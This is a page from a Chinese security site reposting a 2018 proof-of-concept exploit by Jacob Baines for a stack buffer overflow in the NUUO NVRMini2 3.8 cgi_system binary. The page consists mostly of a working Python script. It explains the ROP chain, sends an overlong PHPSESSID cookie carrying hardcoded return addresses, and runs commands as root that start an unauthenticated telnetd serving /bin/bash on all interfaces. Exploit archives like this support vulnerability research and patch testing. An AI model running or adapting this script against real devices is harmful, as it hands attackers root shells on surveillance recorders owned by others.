首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
NUUO NVRMini2 3.8 - 'cgi_system' Buffer Overflow (Enable Telnet)
来源:vfocus.net 作者:Baines 发布时间:2018-09-19  
# Exploit Title: NUUO NVRMini2 3.8 - 'cgi_system' Buffer Overflow (Enable Telnet)
# Date: 2018-09-17
# Exploit Author: Jacob Baines
# Vendor Homepage: https://www.nuuo.com/
# Device: NRVMini2
# Software Link: https://www.nuuo.com/ProductNode.php?node=2
# Versions: 3.8.0 and below
# Tested Against: 03.07.0000.0011 and 03.08.0000.0005
# Tested on: Ubuntu and OSX
# CVE: N/A
# TRA: https://www.tenable.com/security/research/tra-2018-25
# Description:
 
# A stack buffer overflow exists in the cgi_system binary. The error occurs
# due to lack of bounds checking on the PHPSESSID value before and when
# it is passed to sprintf in order to generate the session id file name.
# As written, this exploit enables Telnet.
 
# Executes a command via the stack buffer overflow in cookie parsing. The command
# is executed via 'system' as root. The overlow logic is like so:
#
# address 1: 405e2e34 - load system into r3 and address 2 into lr
#
# .text:000D0E34 0F 48 BD E8                 LDMFD   SP!, {R0-R3,R11,LR}
# .text:000D0E38 1E FF 2F E1                 BX      LR
#
# address 2: 406037cc - load the system command into r0. Jump to system.
#
# .text:000F17CC 0D 00 A0 E1                 MOV     R0, SP
# .text:000F17D0 33 FF 2F E1                 BLX     R3
#
# [   address 1  ][       r0     ][      r1      ][      r2      ][  r3 system   ][      r11     ][  LR - addr2  ][ system command ]
# \x34\x2e\x5e\x40\xaa\xaa\xaa\xaa\xbb\xbb\xbb\xbb\xcc\xcc\xcc\xcc\xfc\xbf\x54\x40\xee\xee\xee\xee\xcc\x37\x60\x40touch /tmp/lolwat
 
# PoC
 
import requests
import socket
import sys
 
def stack_buffer_overflow(command, ip, port):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print '[+] Executing %s on %s:%s...' % (command, ip, port)
    sock.connect((ip, int(port)))
    exec_request = ('GET /cgi-bin/cgi_system?cmd=portCheck HTTP/1.1\r\n' +
                    'Host: ' + ip + ':' + port + '\r\n' +
                    'Accept: */*\r\n' +
                    'Cookie: PHPSESSID=982e6c010064b3878a4b793bfab8d2d2' +
                    'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAABBBBCCCCDD' +
                    '\x34\x2e\x5e\x40\xaa\xaa\xaa\xaa\xbb\xbb\xbb\xbb\xcc\xcc\xcc\xcc\xfc\xbf\x54\x40\xee\xee\xee\xee\xcc\x37\x60\x40' + command +
                    '\r\n\r\n')
    sock.sendall(exec_request)
    data = sock.recv(1024)
    sock.close()
 
    # We should get a 500 Internal error in response
    return data.find('500') != -1
 
# Quickly tries to grab the version of the target. If the target is
# using anything other than 3.7 or 3.8 then we'll bail out since
# haven't tested on any other targets
 
def check_target(ip, port):
    index = requests.get('http://' + ip + ':' + port + "/upgrade_handle.php?cmd=getcurrentinfo")
    return (index.text.find('<Titan>03.08') != -1 or index.text.find('<Titan>03.07') != -1)
 
if __name__ == "__main__":
 
    if (len(sys.argv) != 3):
        print "Usage: python nvrmini2_enable_telnet.py <ipv4 address> <port>"
        sys.exit(1)
 
    ip = sys.argv[1]
    port = sys.argv[2]
 
    if int(port) > 65535:
        print('[-] Invalid port parameter')
        sys.exit(0)
 
    if len(ip.split('.')) != 4:
        print('[-] Invalid IP address parameter')
        sys.exit(0)
 
    print '[+] Checking for a valid target...'
    if (check_target(ip, port) == False):
        print('[-] The target is not a NVRMini2 or its using an untested version.')
        sys.exit(0)
    print '[+] Valid target!'
 
    if (stack_buffer_overflow('mount -t devpts devpts /dev/pts', ip, port) == False):
        print('[-] Mount failed')
        sys.exit(0)
 
    if (stack_buffer_overflow('/bin/sh -c "/usr/sbin/telnetd -l /bin/bash -b 0.0.0.0"&', ip, port) == False):
        print('[-] telnetd bind failed')
        sys.exit(0)
 
    print('[+] Success!')
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·LG SuperSign EZ CMS 2.5 - Loca
·Solaris libnspr NSPR_LOG_FILE
·Microsoft Edge Chakra PathType
·Microsoft Edge Chakra JIT loca
·CA Release Automation NiMi 6.5
·Netis ADSL Router DL4322D RTK
·Oracle VirtualBox Manager 5.2.
·Apache Syncope 2.0.7 Remote Co
·Notebook Pro 2.0 - Denial Of S
·XAMPP Control Panel 3.2.2 - De
·Faleemi Plus 1.0.2 - Denial of
·InfraRecorder 0.53 - '.txt' De
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved